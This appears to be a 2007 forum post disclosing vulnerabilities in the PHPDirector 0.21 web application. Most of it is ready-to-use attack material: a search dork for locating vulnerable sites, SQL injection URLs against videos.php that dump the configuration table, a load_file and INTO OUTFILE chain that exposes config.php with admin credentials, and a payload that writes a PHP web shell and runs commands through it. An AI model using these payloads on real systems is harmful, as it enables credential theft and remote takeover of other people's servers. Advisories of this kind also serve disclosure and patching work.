kw3rln Posted July 1, 2007 Report Posted July 1, 2007 PHPDirector <= 0.21 (SQL injection/Upload SHELL) Remote VulnerabilitiesWEB APP: PHPDirector 0.21SITE: http://www.phpdirector.co.uk/site/DORK: "Powered by PHP Director"AUTHOR: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ]* Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nETDESCRIPTION: - SQL injection in $id of videos.php - admin & password are in config.php - Path disclosure - It doesn`t deserve to make an sploitEXPLOIT:SQL INJECTION: http://www.site.com/videos.php?id=-1%20UNION%20SELECT%20name,news,vids_per_page,version,template,6,7,8,9,10,11,12,13,14,15%20FROM%20pp_configFIND ADMIN PASS & DB INFO:1. We must have teh path .. check: http://www.site.com/videos.php?id[]= (path disclosure)2. http://www.site.com/videos.php?id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,load_file('[path_you_just_found]/config.php')%20FROM%20pp_config%20into%20outfile%20'[path_you_just_found]/config.txt'3. Now check: http://www.site.com/config.txtUPLOAD SHELL:1. We must have teh path .. check: http://www.site.com/videos.php?id[]= (path disclosure)2. http://www.site.com/videos.php?id=-1%20UNION%20SELECT%201,'<?php%20system($_GET[cmd]);%20?>',3,4,5,6,7,8,9,10,11,12,13,14,15%20INTO%20OUTFILE%20'[path_founded]/shell.php'%20FROM%20pp_config3. http://www.site.com/shell.php?cmd=uname -aGREETZ: all memberz of RST and milw0rm//kw3rln [http://rstzone.net][EOF] Quote